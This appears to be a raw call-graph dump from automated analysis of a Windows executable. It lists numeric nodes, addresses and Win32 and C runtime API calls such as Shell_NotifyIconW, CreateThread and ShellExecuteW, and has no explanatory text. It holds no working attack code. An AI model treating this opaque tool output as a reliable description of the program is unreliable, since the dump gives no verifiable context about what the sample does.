3c1db5 93807->93810 93808->93817 93809 3537ed 93821 35390f DeleteObject DestroyWindow Mailbox 93809->93821 93823 352ff6 16 API calls 93810->93823 93815->93779 93818 3c1e4c 93827 354ffc 93818->93827 93820->93809 93821->93817 93822->93806 93823->93817 93824->93792 93825->93804 93826->93818 93828 355027 _memset 93827->93828 93840 354c30 93828->93840 93831 3550ac 93833 3c3d28 Shell_NotifyIconW 93831->93833 93834 3550ca Shell_NotifyIconW 93831->93834 93844 3551af 93834->93844 93836 3550df 93836->93815 93837->93806 93838->93815 93839->93798 93841 354c44 93840->93841 93842 3c3c33 93840->93842 93841->93831 93866 395819 61 API calls _W_store_winword 93841->93866 93842->93841 93843 3c3c3c DestroyIcon 93842->93843 93843->93841 93845 3552a2 Mailbox 93844->93845 93846 3551cb 93844->93846 93845->93836 93867 356b0f 93846->93867 93849 3551e6 93851 356a63 48 API calls 93849->93851 93850 3c3ca1 LoadStringW 93853 3c3cbb 93850->93853 93852 3551fb 93851->93852 93852->93853 93854 35520c 93852->93854 93855 35510d 48 API calls 93853->93855 93856 3552a7 93854->93856 93857 355216 93854->93857 93860 3c3cc5 93855->93860 93858 356eed 48 API calls 93856->93858 93859 35510d 48 API calls 93857->93859 93863 355220 _memset _wcscpy 93858->93863 93859->93863 93861 35518c 48 API calls 93860->93861 93860->93863 93862 3c3ce7 93861->93862 93865 35518c 48 API calls 93862->93865 93864 355288 Shell_NotifyIconW 93863->93864 93864->93845 93865->93863 93866->93831 93868 36f4ea 48 API calls 93867->93868 93869 356b34 93868->93869 93870 356b4a 48 API calls 93869->93870 93871 3551d9 93870->93871 93871->93849 93871->93850 93872 3c19cb 93877 352322 93872->93877 93874 3c19d1 93910 370f0a 52 API calls __cinit 93874->93910 93876 3c19db 93878 352344 93877->93878 93911 3526df 93878->93911 93883 35d7f7 48 API calls 93884 352384 93883->93884 93885 35d7f7 48 API calls 93884->93885 93886 35238e 93885->93886 93887 35d7f7 48 API calls 93886->93887 93888 352398 93887->93888 93889 35d7f7 48 API calls 93888->93889 93890 3523de 93889->93890 93891 35d7f7 48 API calls 93890->93891 93892 3524c1 93891->93892 93919 35263f 93892->93919 93896 3524f1 93897 35d7f7 48 API calls 93896->93897 93898 3524fb 93897->93898 93948 352745 93898->93948 93900 352546 93901 352556 GetStdHandle 93900->93901 93902 3c501d 93901->93902 93903 3525b1 93901->93903 93902->93903 93905 3c5026 93902->93905 93904 3525b7 CoInitialize 93903->93904 93904->93874 93955 3992d4 53 API calls 93905->93955 93907 3c502d 93956 3999f9 CreateThread 93907->93956 93909 3c5039 CloseHandle 93909->93904 93910->93876 93957 352854 93911->93957 93914 356a63 48 API calls 93915 35234a 93914->93915 93916 35272e 93915->93916 93971 3527ec 6 API calls 93916->93971 93918 35237a 93918->93883 93920 35d7f7 48 API calls 93919->93920 93921 35264f 93920->93921 93922 35d7f7 48 API calls 93921->93922 93923 352657 93922->93923 93972 3526a7 93923->93972 93926 3526a7 48 API calls 93927 352667 93926->93927 93928 35d7f7 48 API calls 93927->93928 93929 352672 93928->93929 93930 36f4ea 48 API calls 93929->93930 93931 3524cb 93930->93931 93932 3522a4 93931->93932 93933 3522b2 93932->93933 93934 35d7f7 48 API calls 93933->93934 93935 3522bd 93934->93935 93936 35d7f7 48 API calls 93935->93936 93937 3522c8 93936->93937 93938 35d7f7 48 API calls 93937->93938 93939 3522d3 93938->93939 93940 35d7f7 48 API calls 93939->93940 93941 3522de 93940->93941 93942 3526a7 48 API calls 93941->93942 93943 3522e9 93942->93943 93944 36f4ea 48 API calls 93943->93944 93945 3522f0 93944->93945 93946 3c1fe7 93945->93946 93947 3522f9 RegisterWindowMessageW 93945->93947 93947->93896 93949 352755 93948->93949 93950 3c5f4d 93948->93950 93951 36f4ea 48 API calls 93949->93951 93977 39c942 50 API calls 93950->93977 93953 35275d 93951->93953 93953->93900 93954 3c5f58 93955->93907 93956->93909 93978 3999df 54 API calls 93956->93978 93964 352870 93957->93964 93960 352870 48 API calls 93961 352864 93960->93961 93962 35d7f7 48 API calls 93961->93962 93963 352716 93962->93963 93963->93914 93965 35d7f7 48 API calls 93964->93965 93966 35287b 93965->93966 93967 35d7f7 48 API calls 93966->93967 93968 352883 93967->93968 93969 35d7f7 48 API calls 93968->93969 93970 35285c 93969->93970 93970->93960 93971->93918 93973 35d7f7 48 API calls 93972->93973 93974 3526b0 93973->93974 93975 35d7f7 48 API calls 93974->93975 93976 35265f 93975->93976 93976->93926 93977->93954 93979 375dfd 93980 375e09 _fseek 93979->93980 94016 377eeb GetStartupInfoW 93980->94016 93983 375e0e 94018 379ca7 GetProcessHeap 93983->94018 93984 375e66 93985 375e71 93984->93985 94103 375f4d 47 API calls 3 library calls 93984->94103 94019 377b47 93985->94019 93988 375e77 93989 375e82 __RTC_Initialize 93988->93989 94104 375f4d 47 API calls 3 library calls 93988->94104 94040 37acb3 93989->94040 93992 375e91 93993 375e9d GetCommandLineW 93992->93993 94105 375f4d 47 API calls 3 library calls 93992->94105 94059 382e7d GetEnvironmentStringsW 93993->94059 93996 375e9c 93996->93993 94000 375ec2 94072 382cb4 94000->94072 94003 375ec8 94004 375ed3 94003->94004 94107 37115b 47 API calls 3 library calls 94003->94107 94086 371195 94004->94086 94007 375edb 94009 375ee6 __wwincmdln 94007->94009 94108 37115b 47 API calls 3 library calls 94007->94108 94090 353a0f 94009->94090 94011 375efa 94012 375f09 94011->94012 94109 3713f1 47 API calls _doexit 94011->94109 94110 371186 47 API calls _doexit 94012->94110 94015 375f0e _fseek 94017 377f01 94016->94017 94017->93983 94018->93984 94111 37123a 30 API calls 2 library calls 94019->94111 94021 377b4c 94112 377e23 InitializeCriticalSectionAndSpinCount 94021->94112 94023 377b51 94024 377b55 94023->94024 94114 377e6d TlsAlloc 94023->94114 94113 377bbd 50 API calls 2 library calls 94024->94113 94027 377b5a 94027->93988 94028 377b67 94028->94024 94029 377b72 94028->94029 94115 376986 94029->94115 94032 377bb4 94123 377bbd 50 API calls 2 library calls 94032->94123 94035 377bb9 94035->93988 94036 377b93 94036->94032 94037 377b99 94036->94037 94122 377a94 47 API calls 4 library calls 94037->94122 94039 377ba1 GetCurrentThreadId 94039->93988 94041 37acbf _fseek 94040->94041 94132 377cf4 94041->94132 94043 37acc6 94044 376986 __calloc_crt 47 API calls 94043->94044 94046 37acd7 94044->94046 94045 37ad42 GetStartupInfoW 94054 37ae80 94045->94054 94056 37ad57 94045->94056 94046->94045 94047 37ace2 _fseek @_EH4_CallFilterFunc@8 94046->94047 94047->93992 94048 37af44 94139 37af58 LeaveCriticalSection _doexit 94048->94139 94050 37aec9 GetStdHandle 94050->94054 94051 376986 __calloc_crt 47 API calls 94051->94056 94052 37aedb GetFileType 94052->94054 94053 37ada5 94053->94054 94057 37add7 GetFileType 94053->94057 94058 37ade5 InitializeCriticalSectionAndSpinCount 94053->94058 94054->94048 94054->94050 94054->94052 94055 37af08 InitializeCriticalSectionAndSpinCount 94054->94055 94055->94054 94056->94051 94056->94053 94056->94054 94057->94053 94057->94058 94058->94053 94060 382e8e 94059->94060 94061 375ead 94059->94061 94178 3769d0 47 API calls __crtGetStringTypeA_stat 94060->94178 94066 382a7b GetModuleFileNameW 94061->94066 94064 382eb4 ___crtGetEnvironmentStringsW 94065 382eca FreeEnvironmentStringsW 94064->94065 94065->94061 94067 382aaf _wparse_cmdline 94066->94067 94068 375eb7 94067->94068 94069 382ae9 94067->94069 94068->94000 94106 37115b 47 API calls 3 library calls 94068->94106 94179 3769d0 47 API calls __crtGetStringTypeA_stat 94069->94179 94071 382aef _wparse_cmdline 94071->94068 94073 382ccd __wsetenvp 94072->94073 94077 382cc5 94072->94077 94074 376986 __calloc_crt 47 API calls 94073->94074 94082 382cf6 __wsetenvp 94074->94082 94075 382d4d 94076 371c9d _free 47 API calls 94075->94076 94076->94077 94077->94003 94078 376986 __calloc_crt 47 API calls 94078->94082 94079 382d72 94080 371c9d _free 47 API calls 94079->94080 94080->94077 94082->94075 94082->94077 94082->94078 94082->94079 94083 382d89 94082->94083 94180 382567 47 API calls _fseek 94082->94180 94181 376e20 IsProcessorFeaturePresent 94083->94181 94085 382d95 94085->94003 94087 3711a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 94086->94087 94089 3711e0 __IsNonwritableInCurrentImage 94087->94089 94204 370f0a 52 API calls __cinit 94087->94204 94089->94007 94091 3c1ebf 94090->94091 94092 353a29 94090->94092 94093 353a63 IsThemeActive 94092->94093 94205 371405 94093->94205 94097 353a8f 94217 353adb SystemParametersInfoW SystemParametersInfoW 94097->94217 94099 353a9b 94218 353d19 94099->94218 94101 353aa3 SystemParametersInfoW 94102 353ac8 94101->94102 94102->94011 94103->93985 94104->93989 94105->93996 94109->94012 94110->94015 94111->94021 94112->94023 94113->94027 94114->94028 94117 37698d 94115->94117 94118 3769ca 94117->94118 94119 3769ab Sleep 94117->94119 94124 3830aa 94117->94124 94118->94032 94121 377ec9 TlsSetValue 94118->94121 94120 3769c2 94119->94120 94120->94117 94120->94118 94121->94036 94122->94039 94123->94035 94125 3830b5 94124->94125 94129 3830d0 __calloc_impl 94124->94129 94126 3830c1 94125->94126 94125->94129 94131 377c0e 47 API calls __getptd_noexit 94126->94131 94128 3830e0 HeapAlloc 94128->94129 94130 3830c6 94128->94130 94129->94128 94129->94130 94130->94117 94131->94130 94133 377d05 94132->94133 94134 377d18 EnterCriticalSection 94132->94134 94140 377d7c 94133->94140 94134->94043 94136 377d0b 94136->94134 94164 37115b 47 API calls 3 library calls 94136->94164 94139->94047 94141 377d88 _fseek 94140->94141 94142 377d91 94141->94142 94143 377da9 94141->94143 94165 3781c2 47 API calls 2 library calls 94142->94165 94147 377e11 _fseek 94143->94147 94158 377da7 94143->94158 94146 377d96 94166 37821f 47 API calls 8 library calls 94146->94166 94147->94136 94148 377dbd 94150 377dc4 94148->94150 94151 377dd3 94148->94151 94169 377c0e 47 API calls __getptd_noexit 94150->94169 94154 377cf4 __lock 46 API calls 94151->94154 94152 377d9d 94167 371145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94152->94167 94157 377dda 94154->94157 94156 377dc9 94156->94147 94159 377dfe 94157->94159 94160 377de9 InitializeCriticalSectionAndSpinCount 94157->94160 94158->94143 94168 3769d0 47 API calls __crtGetStringTypeA_stat 94158->94168 94170 371c9d 94159->94170 94161 377e04 94160->94161 94176 377e1a LeaveCriticalSection _doexit 94161->94176 94165->94146 94166->94152 94168->94148 94169->94156 94171 371ca6 RtlFreeHeap 94170->94171 94175 371ccf __dosmaperr 94170->94175 94172 371cbb 94171->94172 94171->94175 94177 377c0e 47 API calls __getptd_noexit 94172->94177 94174 371cc1 GetLastError 94174->94175 94175->94161 94176->94147 94177->94174 94178->94064 94179->94071 94180->94082 94182 376e2b 94181->94182 94187 376cb5 94182->94187 94186 376e46 94186->94085 94188 376ccf _memset ___raise_securityfailure 94187->94188 94189 376cef IsDebuggerPresent 94188->94189 94195 3781ac SetUnhandledExceptionFilter UnhandledExceptionFilter 94189->94195 94192 376dd6 94194 378197 GetCurrentProcess TerminateProcess 94192->94194 94193 376db3 ___raise_securityfailure 94196 37a70c 94193->94196 94194->94186 94195->94193 94197 37a716 IsProcessorFeaturePresent 94196->94197 94198 37a714 94196->94198 94200 3837b0 94197->94200 94198->94192 94203 38375f 5 API calls ___raise_securityfailure 94200->94203 94202 383893 94202->94192 94203->94202 94204->94089 94206 377cf4 __lock 47 API calls 94205->94206 94207 371410 94206->94207 94270 377e58 LeaveCriticalSection 94207->94270 94209 353a88 94210 37146d 94209->94210 94211 371477 94210->94211 94212 371491 94210->94212 94211->94212 94271 377c0e 47 API calls __getptd_noexit 94211->94271 94212->94097 94214 371481 94272 376e10 8 API calls _fseek 94214->94272 94216 37148c 94216->94097 94217->94099 94219 353d26 __ftell_nolock 94218->94219 94220 35d7f7 48 API calls 94219->94220 94221 353d31 GetCurrentDirectoryW 94220->94221 94273 3561ca 94221->94273 94223 353d57 IsDebuggerPresent 94224 353d65 94223->94224 94225 3c1cc1 MessageBoxA 94223->94225 94227 3c1cd9 94224->94227 94228 353d82 94224->94228 94256 353e3a 94224->94256 94225->94227 94226 353e41 SetCurrentDirectoryW 94229 353e4e Mailbox 94226->94229 94449 36c682 48 API calls 94227->94449 94347 3540e5 94228->94347 94229->94101 94233 3c1ce9 94237 3c1cff SetCurrentDirectoryW 94233->94237 94234 353da0 GetFullPathNameW 94235 356a63 48 API calls 94234->94235 94236 353ddb 94235->94236 94363 356430 94236->94363 94237->94229 94240 353df6 94241 353e00 94240->94241 94450 3971fa AllocateAndInitializeSid CheckTokenMembership FreeSid 94240->94450 94379 353e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 94241->94379 94244 3c1d1c 94244->94241 94247 3c1d2d 94244->94247 94249 355374 50 API calls 94247->94249 94248 353e0a 94250 353e1f 94248->94250 94252 354ffc 67 API calls 94248->94252 94251 3c1d35 94249->94251 94387 35e8d0 94250->94387 94255 35ce19 48 API calls 94251->94255 94252->94250 94257 3c1d42 94255->94257 94256->94226 94259 3c1d6e 94257->94259 94260 3c1d49 94257->94260 94261 35518c 48 API calls 94259->94261 94262 35518c 48 API calls 94260->94262 94269 3c1d6a GetForegroundWindow ShellExecuteW 94261->94269 94263 3c1d54 94262->94263 94264 35510d 48 API calls 94263->94264 94266 3c1d61 94264->94266 94268 35518c 48 API calls 94266->94268 94267 3c1d9e Mailbox 94267->94256 94268->94269 94269->94267 94270->94209 94271->94214 94272->94216 94451 36e99b 94273->94451 94277 3561eb 94278 355374 50 API calls 94277->94278 94279 3561ff 94278->94279 94280 35ce19 48 API calls 94279->94280 94281 35620c 94280->94281 94468 3539db 94281->94468 94283 356216 Mailbox 94284 356eed 48 API calls 94283->94284 94285 35622b 94284->94285 94480 359048 94285->94480 94288 35ce19 48 API calls 94289 356244 94288->94289 94483 35d6e9 94289->94483 94291 356254 Mailbox 94292 35ce19 48 API calls 94291->94292 94293 35627c 94292->94293 94294 35d6e9 55 API calls 94293->94294 94295 35628f Mailbox 94294->94295 94296 35ce19 48 API calls 94295->94296 94297 3562a0 94296->94297 94487 35d645 94297->94487 94299 3562b2 Mailbox 94300 35d7f7 48 API calls 94299->94300 94301 3562c5 94300->94301 94497 3563fc 94301->94497 94305 3562df 94306 3c1c08 94305->94306 94307 3562e9 94305->94307 94308 3563fc 48 API calls 94306->94308 94309 370fa7 _W_store_winword 59 API calls 94307->94309 94310 3c1c1c 94308->94310 94311 3562f4 94309->94311 94314 3563fc 48 API calls 94310->94314 94311->94310 94312 3562fe 94311->94312 94313 370fa7 _W_store_winword 59 API calls 94312->94313 94315 356309 94313->94315 94316 3c1c38 94314->94316 94315->94316 94317 356313 94315->94317 94319 355374 50 API calls 94316->94319 94318 370fa7 _W_store_winword 59 API calls 94317->94318 94320 35631e 94318->94320 94321 3c1c5d 94319->94321 94322 35635f 94320->94322 94325 3c1c86 94320->94325 94328 3563fc 48 API calls 94320->94328 94323 3563fc 48 API calls 94321->94323 94322->94325 94326 35636c 94322->94326 94324 3c1c69 94323->94324 94327 356eed 48 API calls 94324->94327 94329 356eed 48 API calls 94325->94329 94333 36c050 48 API calls 94326->94333 94330 3c1c77 94327->94330 94331 356342 94328->94331 94332 3c1ca8 94329->94332 94335 3563fc 48 API calls 94330->94335 94336 356eed 48 API calls 94331->94336 94337 3563fc 48 API calls 94332->94337 94334 356384 94333->94334 94338 361b90 48 API calls 94334->94338 94335->94325 94339 356350 94336->94339 94340 3c1cb5 94337->94340 94341 356394 94338->94341 94342 3563fc 48 API calls 94339->94342 94340->94340 94343 361b90 48 API calls 94341->94343 94345 3563d6 Mailbox 94341->94345 94346 3563fc 48 API calls 94341->94346 94513 356b68 48 API calls 94341->94513 94342->94322 94343->94341 94345->94223 94346->94341 94348 3540f2 __ftell_nolock 94347->94348 94349 3c370e _memset 94348->94349 94350 35410b 94348->94350 94352 3c372a GetOpenFileNameW 94349->94352 94351 35660f 49 API calls 94350->94351 94353 354114 94351->94353 94354 3c3779 94352->94354 94991 3540a7 94353->94991 94356 356a63 48 API calls 94354->94356 94358 3c378e 94356->94358 94358->94358 94360 354129 95009 354139 94360->95009 94364 35643d __ftell_nolock 94363->94364 95224 354c75 94364->95224 94366 356442 94378 353dee 94366->94378 95235 355928 86 API calls 94366->95235 94368 35644f 94368->94378 95236 355798 88 API calls Mailbox 94368->95236 94370 356458 94371 35645c GetFullPathNameW 94370->94371 94370->94378 94372 356a63 48 API calls 94371->94372 94373 356488 94372->94373 94374 356a63 48 API calls 94373->94374 94375 356495 94374->94375 94376 3c5dcf _wcscat 94375->94376 94377 356a63 48 API calls 94375->94377 94377->94378 94378->94233 94378->94240 94380 3c1cba 94379->94380 94381 353ed8 94379->94381 95273 354024 94381->95273 94385 353e05 94386 3536b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94385->94386 94386->94248 94388 35e8eb 94387->94388 94390 35ed52 94388->94390 94411 35e906 Mailbox 94388->94411 94389 39cc5c 86 API calls 94389->94411 95365 36e3cd 335 API calls 94390->95365 94391 35ebc7 94393 353e2a 94391->94393 95366 352ff6 16 API calls 94391->95366 94393->94256 94448 353847 Shell_NotifyIconW _memset 94393->94448 94395 35ed63 94395->94393 94396 35ed70 94395->94396 95367 36e312 335 API calls Mailbox 94396->95367 94397 35e94c PeekMessageW 94397->94411 94399 3c526e Sleep 94399->94411 94400 35ed77 LockWindowUpdate DestroyWindow GetMessageW 94400->94393 94402 35eda9 94400->94402 94403 3c59ef TranslateMessage DispatchMessageW GetMessageW 94402->94403 94403->94403 94405 3c5a1f 94403->94405 94405->94393 94406 35ed21 PeekMessageW 94406->94411 94407 351caa 49 API calls 94407->94411 94408 35ebf7 timeGetTime 94408->94411 94410 356eed 48 API calls 94410->94411 94411->94389 94411->94391 94411->94397 94411->94399 94411->94406 94411->94407 94411->94408 94411->94410 94412 35ed3a TranslateMessage DispatchMessageW 94411->94412 94413 3c5557 WaitForSingleObject 94411->94413 94414 36f4ea 48 API calls 94411->94414 94417 3c588f Sleep 94411->94417 94418 3c5429 Mailbox 94411->94418 94419 35edae timeGetTime 94411->94419 94420 3c5733 Sleep 94411->94420 94426 352aae 311 API calls 94411->94426 94428 3c5445 Sleep 94411->94428 94440 35fe30 311 API calls 94411->94440 94446 35ce19 48 API calls 94411->94446 94447 35d6e9 55 API calls 94411->94447 95278 35f110 94411->95278 95343 3645e0 94411->95343 95360 35eed0 335 API calls Mailbox 94411->95360 95361 35ef00 86 API calls 94411->95361 95362 363200 335 API calls 2 library calls 94411->95362 95363 36e244 TranslateAcceleratorW 94411->95363 95364 36dc5f IsDialogMessageW GetClassLongW 94411->95364 95369 3b8d23 48 API calls 94411->95369 94412->94406 94413->94411 94415 3c5574 GetExitCodeProcess CloseHandle 94413->94415 94414->94411 94415->94411 94416 35d7f7 48 API calls 94416->94418 94417->94418 94418->94411 94418->94416 94424 3c5926 GetExitCodeProcess 94418->94424 94427 36dc38 timeGetTime 94418->94427 94418->94428 94431 3c5432 Sleep 94418->94431 94432 3b8c4b 108 API calls 94418->94432 94433 352c79 107 API calls 94418->94433 94435 3c59ae Sleep 94418->94435 94437 35ce19 48 API calls 94418->94437 94441 35d6e9 55 API calls 94418->94441 95370 394cbe 49 API calls Mailbox 94418->95370 95371 351caa 49 API calls 94418->95371 95372 352aae 335 API calls 94418->95372 95373 3accb2 50 API calls 94418->95373 95374 397a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94418->95374 95375 396532 63 API calls 3 library calls 94418->95375 95368 351caa 49 API calls 94419->95368 94420->94418 94429 3c593c WaitForSingleObject 94424->94429 94430 3c5952 CloseHandle 94424->94430 94426->94411 94427->94418 94428->94411 94429->94411 94429->94430 94430->94418 94431->94428 94432->94418 94433->94418 94435->94411 94437->94418 94440->94411 94441->94418 94446->94411 94447->94411 94448->94256 94449->94233 94450->94244 94452 35d7f7 48 API calls 94451->94452 94453 3561db 94452->94453 94454 356009 94453->94454 94455 356016 __ftell_nolock 94454->94455 94456 356a63 48 API calls 94455->94456 94460 35617c Mailbox 94455->94460 94458 356048 94456->94458 94467 35607e Mailbox 94458->94467 94514 3561a6 94458->94514 94459 3561a6 48 API calls 94459->94467 94460->94277 94461 35614f 94461->94460 94462 35ce19 48 API calls 94461->94462 94464 356170 94462->94464 94463 35ce19 48 API calls 94463->94467 94465 3564cf 48 API calls 94464->94465 94465->94460 94466 3564cf 48 API calls 94466->94467 94467->94459 94467->94460 94467->94461 94467->94463 94467->94466 94517 3541a9 94468->94517 94471 353a06 94471->94283 94474 3c2ff0 94476 371c9d _free 47 API calls 94474->94476 94477 3c2ffd 94476->94477 94478 354252 84 API calls 94477->94478 94479 3c3006 94478->94479 94479->94479 94481 36f4ea 48 API calls 94480->94481 94482 356237 94481->94482 94482->94288 94484 35d6f4 94483->94484 94486 35d71b 94484->94486 94984 35d764 55 API calls 94484->94984 94486->94291 94488 35d654 94487->94488 94496 35d67e 94487->94496 94489 35d65b 94488->94489 94492 35d6c2 94488->94492 94490 35d6ab 94489->94490 94491 35d666 94489->94491 94490->94496 94986 36dce0 53 API calls 94490->94986 94985 35d9a0 53 API calls __cinit 94491->94985 94492->94490 94987 36dce0 53 API calls 94492->94987 94496->94299 94498 356406 94497->94498 94499 35641f 94497->94499 94500 356eed 48 API calls 94498->94500 94501 356a63 48 API calls 94499->94501 94502 3562d1 94500->94502 94501->94502 94503 370fa7 94502->94503 94504 370fb3 94503->94504 94505 371028 94503->94505 94512 370fd8 94504->94512 94988 377c0e 47 API calls __getptd_noexit 94504->94988 94990 37103a 59 API calls 3 library calls 94505->94990 94508 371035 94508->94305 94509 370fbf 94989 376e10 8 API calls _fseek 94509->94989 94511 370fca 94511->94305 94512->94305 94513->94341 94515 35bdfa 48 API calls 94514->94515 94516 3561b1 94515->94516 94516->94458 94582 354214 94517->94582 94522 3541d4 LoadLibraryExW 94592 354291 94522->94592 94523 3c4f73 94525 354252 84 API calls 94523->94525 94527 3c4f7a 94525->94527 94529 354291 3 API calls 94527->94529 94531 3c4f82 94529->94531 94530 3541fb 94530->94531 94532 354207 94530->94532 94618 3544ed 94531->94618 94533 354252 84 API calls 94532->94533 94536 3539fe 94533->94536 94536->94471 94541 39c396 94536->94541 94538 3c4fa9 94626 354950 94538->94626 94540 3c4fb6 94542 354517 83 API calls 94541->94542 94543 39c405 94542->94543 94804 39c56d 94543->94804 94546 3544ed 64 API calls 94547 39c432 94546->94547 94548 3544ed 64 API calls 94547->94548 94549 39c442 94548->94549 94550 3544ed 64 API calls 94549->94550 94551 39c45d 94550->94551 94552 3544ed 64 API calls 94551->94552 94553 39c478 94552->94553 94554 354517 83 API calls 94553->94554 94555 39c48f 94554->94555 94556 37395c __crtGetStringTypeA_stat 47 API calls 94555->94556 94557 39c496 94556->94557 94558 37395c __crtGetStringTypeA_stat 47 API calls 94557->94558 94559 39c4a0 94558->94559 94560 3544ed 64 API calls 94559->94560 94561 39c4b4 94560->94561 94562 39bf5a GetSystemTimeAsFileTime 94561->94562 94563 39c4c7 94562->94563 94564 39c4dc 94563->94564 94565 39c4f1 94563->94565 94568 371c9d _free 47 API calls 94564->94568 94566 39c4f7 94565->94566 94567 39c556 94565->94567 94810 39b965 94566->94810 94570 371c9d _free 47 API calls 94567->94570 94571 39c4e2 94568->94571 94573 39c41b 94570->94573 94574 371c9d _free 47 API calls 94571->94574 94573->94474 94576 354252 94573->94576 94574->94573 94575 371c9d _free 47 API calls 94575->94573 94577 354263 94576->94577 94578 35425c 94576->94578 94580 354283 FreeLibrary 94577->94580 94581 354272 94577->94581 94579 3735e4 __fcloseall 83 API calls 94578->94579 94579->94577 94580->94581 94581->94474 94631 354339 94582->94631 94585 35423c 94587 354244 FreeLibrary 94585->94587 94588 3541bb 94585->94588 94587->94588 94589 373499 94588->94589 94639 3734ae 94589->94639 94591 3541c8 94591->94522 94591->94523 94718 3542e4 94592->94718 94595 3542b8 94596 3542c1 FreeLibrary 94595->94596 94597 3541ec 94595->94597 94596->94597 94599 354380 94597->94599 94600 36f4ea 48 API calls 94599->94600 94601 354395 94600->94601 94602 3547b7 48 API calls 94601->94602 94603 3543a1 ___crtGetEnvironmentStringsW 94602->94603 94604 3543dc 94603->94604 94606 3544d1 94603->94606 94607 354499 94603->94607 94605 354950 57 API calls 94604->94605 94614 3543e5 94605->94614 94737 39c750 93 API calls 94606->94737 94726 35406b CreateStreamOnHGlobal 94607->94726 94610 3544ed 64 API calls 94610->94614 94612 354479 94612->94530 94613 3c4ed7 94615 354517 83 API calls 94613->94615 94614->94610 94614->94612 94614->94613 94732 354517 94614->94732 94616 3c4eeb 94615->94616 94617 3544ed 64 API calls 94616->94617 94617->94612 94619 3544ff 94618->94619 94622 3c4fc0 94618->94622 94761 37381e 94619->94761 94623 39bf5a 94781 39bdb4 94623->94781 94625 39bf70 94625->94538 94627 35495f 94626->94627 94628 3c5002 94626->94628 94786 373e65 94627->94786 94630 354967 94630->94540 94635 35434b 94631->94635 94634 354321 LoadLibraryA GetProcAddress 94634->94585 94636 35422f 94635->94636 94637 354354 LoadLibraryA 94635->94637 94636->94585 94636->94634 94637->94636 94638 354365 GetProcAddress 94637->94638 94638->94636 94642 3734ba _fseek 94639->94642 94640 3734cd 94687 377c0e 47 API calls __getptd_noexit 94640->94687 94642->94640 94643 3734fe 94642->94643 94658 37e4c8 94643->94658 94644 3734d2 94688 376e10 8 API calls _fseek 94644->94688 94647 373503 94648 37350c 94647->94648 94649 373519 94647->94649 94689 377c0e 47 API calls __getptd_noexit 94648->94689 94651 373543 94649->94651 94652 373523 94649->94652 94672 37e5e0 94651->94672 94690 377c0e 47 API calls __getptd_noexit 94652->94690 94653 3734dd _fseek @_EH4_CallFilterFunc@8 94653->94591 94659 37e4d4 _fseek 94658->94659 94660 377cf4 __lock 47 API calls 94659->94660 94667 37e4e2 94660->94667 94661 37e559 94697 3769d0 47 API calls __crtGetStringTypeA_stat 94661->94697 94664 37e560 94666 37e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94664->94666 94670 37e552 94664->94670 94665 37e5cc _fseek 94665->94647 94666->94670 94667->94661 94668 377d7c __mtinitlocknum 47 API calls 94667->94668 94667->94670 94695 374e5b 48 API calls __lock 94667->94695 94696 374ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94667->94696 94668->94667 94692 37e5d7 94670->94692 94673 37e600 __wopenfile 94672->94673 94674 37e61a 94673->94674 94686 37e7d5 94673->94686 94704 37185b 59 API calls 2 library calls 94673->94704 94702 377c0e 47 API calls __getptd_noexit 94674->94702 94676 37e61f 94703 376e10 8 API calls _fseek 94676->94703 94678 37354e 94691 373570 LeaveCriticalSection LeaveCriticalSection _fseek 94678->94691 94679 37e838 94699 3863c9 94679->94699 94682 37e7ce 94682->94686 94705 37185b 59 API calls 2 library calls 94682->94705 94684 37e7ed 94684->94686 94706 37185b 59 API calls 2 library calls 94684->94706 94686->94674 94686->94679 94687->94644 94688->94653 94689->94653 94690->94653 94691->94653 94698 377e58 LeaveCriticalSection 94692->94698 94694 37e5de 94694->94665 94695->94667 94696->94667 94697->94664 94698->94694 94707 385bb1 94699->94707 94701 3863e2 94701->94678 94702->94676 94703->94678 94704->94682 94705->94684 94706->94686 94708 385bbd _fseek 94707->94708 94709 385bcf 94708->94709 94712 385c06 94708->94712 94710 377c0e _fseek 47 API calls 94709->94710 94711 385bd4 94710->94711 94713 376e10 _fseek 8 API calls 94711->94713 94714 385c78 __wsopen_helper 110 API calls 94712->94714 94717 385bde _fseek 94713->94717 94715 385c23 94714->94715 94716 385c4c __wsopen_helper LeaveCriticalSection 94715->94716 94716->94717 94717->94701 94722 3542f6 94718->94722 94721 3542cc LoadLibraryA GetProcAddress 94721->94595 94723 3542aa 94722->94723 94724 3542ff LoadLibraryA 94722->94724 94723->94595 94723->94721 94724->94723 94725 354310 GetProcAddress 94724->94725 94725->94723 94727 354085 FindResourceExW 94726->94727 94731 3540a2 94726->94731 94728 3c4f16 LoadResource 94727->94728 94727->94731 94729 3c4f2b SizeofResource 94728->94729 94728->94731 94730 3c4f3f LockResource 94729->94730 94729->94731 94730->94731 94731->94604 94733 354526 94732->94733 94736 3c4fe0 94732->94736 94738 373a8d 94733->94738 94735 354534 94735->94614 94737->94604 94740 373a99 _fseek 94738->94740 94739 373aa7 94751 377c0e 47 API calls __getptd_noexit 94739->94751 94740->94739 94742 373acd 94740->94742 94753 374e1c 94742->94753 94743 373aac 94752 376e10 8 API calls _fseek 94743->94752 94746 373ad3 94759 3739fe 81 API calls 3 library calls 94746->94759 94748 373ae2 94760 373b04 LeaveCriticalSection LeaveCriticalSection _fseek 94748->94760 94750 373ab7 _fseek 94750->94735 94751->94743 94752->94750 94754 374e4e EnterCriticalSection 94753->94754 94755 374e2c 94753->94755 94757 374e44 94754->94757 94755->94754 94756 374e34 94755->94756 94758 377cf4 __lock 47 API calls 94756->94758 94757->94746 94758->94757 94759->94748 94760->94750 94764 373839 94761->94764 94763 354510 94763->94623 94765 373845 _fseek 94764->94765 94766 37385b _memset 94765->94766 94767 373888 94765->94767 94768 373880 _fseek 94765->94768 94777 377c0e 47 API calls __getptd_noexit 94766->94777 94769 374e1c __lock_file 48 API calls 94767->94769 94768->94763 94770 37388e 94769->94770 94779 37365b 62 API calls 6 library calls 94770->94779 94773 373875 94778 376e10 8 API calls _fseek 94773->94778 94774 3738a4 94780 3738c2 LeaveCriticalSection LeaveCriticalSection _fseek 94774->94780 94777->94773 94778->94768 94779->94774 94780->94768 94784 37344a GetSystemTimeAsFileTime 94781->94784 94783 39bdc3 94783->94625 94785 373478 __aulldiv 